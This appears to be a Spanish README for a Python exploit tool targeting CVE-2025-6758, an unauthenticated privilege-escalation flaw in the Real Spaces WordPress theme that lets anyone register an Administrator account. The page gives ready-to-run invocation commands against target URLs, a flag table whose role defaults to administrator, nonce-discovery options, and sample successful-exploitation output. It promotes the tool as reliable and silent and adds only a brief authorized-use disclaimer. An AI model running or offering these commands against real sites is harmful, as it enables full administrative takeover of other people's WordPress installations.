
Real Spaces - Tema de directorio de propiedades para WordPress <= 3.6 - Escalada de privilegios no autenticada a Administrador
imic_agent_registerCVE-2025-6758
Puntuación CVSS: 9.8 (Crítico)
El tema Real Spaces - Directorio de Propiedades de WordPress para WordPress es vulnerable a la escalación de privilegios a través de la función imic_agent_register en todas las versiones hasta la 3.6 inclusive.
Esta vulnerabilidad se debe a restricciones insuficientes en la asignación de roles durante el registro, lo que permite a atacantes no autenticados especificar arbitrariamente su rol, incluido Administrator, al registrar un nuevo usuario.
Esta falla crítica permite a atacantes remotos obtener acceso administrativo completo a sitios WordPress que ejecutan versiones vulnerables del tema, comprometiendo la integridad y la seguridad del sistema afectado.
CVE-2025-6758.py es un script profesional de explotación y automatización escrito en Python para demostrar y aprovechar esta vulnerabilidad.
El script está diseñado para probadores de penetración e investigadores de seguridad, y ofrece descubrimiento automatizado, extracción de nonce y explotación de manera altamente confiable, modular y silenciosa.
python3 CVE-2025-6758.py -u http://TARGET/wordpress/
--username Establecer nombre de usuario personalizado (por defecto: Nxploited)--password Establecer contraseña personalizada (por defecto: 123456789)--email Establecer correo electrónico personalizado (por defecto: [email protected])--position Establecer posición personalizada (por defecto: Nxploitedadmin)--role Establecer rol de usuario (por defecto: administrator)--max-pages Número máximo de páginas a rastrear para el descubrimiento de nonce (por defecto: 30)--max-depth Profundidad máxima de rastreo de enlaces (por defecto: 2)--scan-common-paths Escanear rutas adicionales de registro/plugins/temas--ajax-path Endpoint personalizado para POST AJAX (por defecto: wp-admin/admin-ajax.php)--verify-ssl Habilitar verificación de certificado SSL--cookie-save Ruta para guardar cookies de sesiónpython3 CVE-2025-6758.py -u http://192.168.100.74:888/wordpress/ --username AdminX --password MySecretPass123 --scan-common-paths --debug
Tras una explotación exitosa, el script mostrará:
[+] Exploitation successful.
[+] Server message: You're successfully register
[+] Username: Nxploited
[+] Password: 123456789
[+] Email: [email protected]
Si la explotación falla o no se encuentra el nonce, se mostrarán mensajes de error descriptivos y sugerencias para resolver el problema.
Este script está destinado únicamente a fines educativos, de investigación y de pruebas de penetración autorizadas.
Cualquier uso no autorizado contra sitios web o sistemas sin el permiso explícito por escrito del propietario está estrictamente prohibido y puede ser ilegal.
El autor no asume ninguna responsabilidad por el uso indebido o los daños derivados del uso de este script.
📧 Correo electrónico: [email protected]
📨 Telegram: @Kxploit
📡 Canal de Telegram: @KNxploited
Por: Nxploited ( Khaled Alenazi )
| Argument | Default Value | Description |
|---|
--username | Nxploited | Establecer nombre de usuario personalizado para el registro |
--password | 123456789 | Establecer contraseña personalizada para el registro |
--email | [email protected] | Establecer dirección de correo electrónico personalizada |
--position | Nxploitedadmin | Establecer valor de posición personalizado |
--role | administrator | Establecer rol de registro (se recomienda Administrador para la explotación) |
--max-pages | 30 | Número máximo de páginas a rastrear para el descubrimiento de nonce |
--max-depth | 2 | Profundidad máxima de rastreo de enlaces |
--scan-common-paths | None | Escanear rutas adicionales de registro/plugins/temas en busca de nonce (solo bandera) |
--ajax-path | wp-admin/admin-ajax.php | Endpoint personalizado para POST AJAX |
--verify-ssl | None | Habilitar verificación de certificado SSL (solo bandera) |
--cookie-save | None | Ruta para guardar cookies de sesión (formato pickle) |
--save-json | None | Ruta para guardar los resultados del descubrimiento de nonce como JSON |
--debug | None | Habilitar registro de depuración e imprimir fragmentos HTML/JS (solo bandera) |
--save-json Ruta para guardar los resultados del descubrimiento de nonce como JSON--debug Habilitar registro de depuración e imprimir fragmentos HTML/JS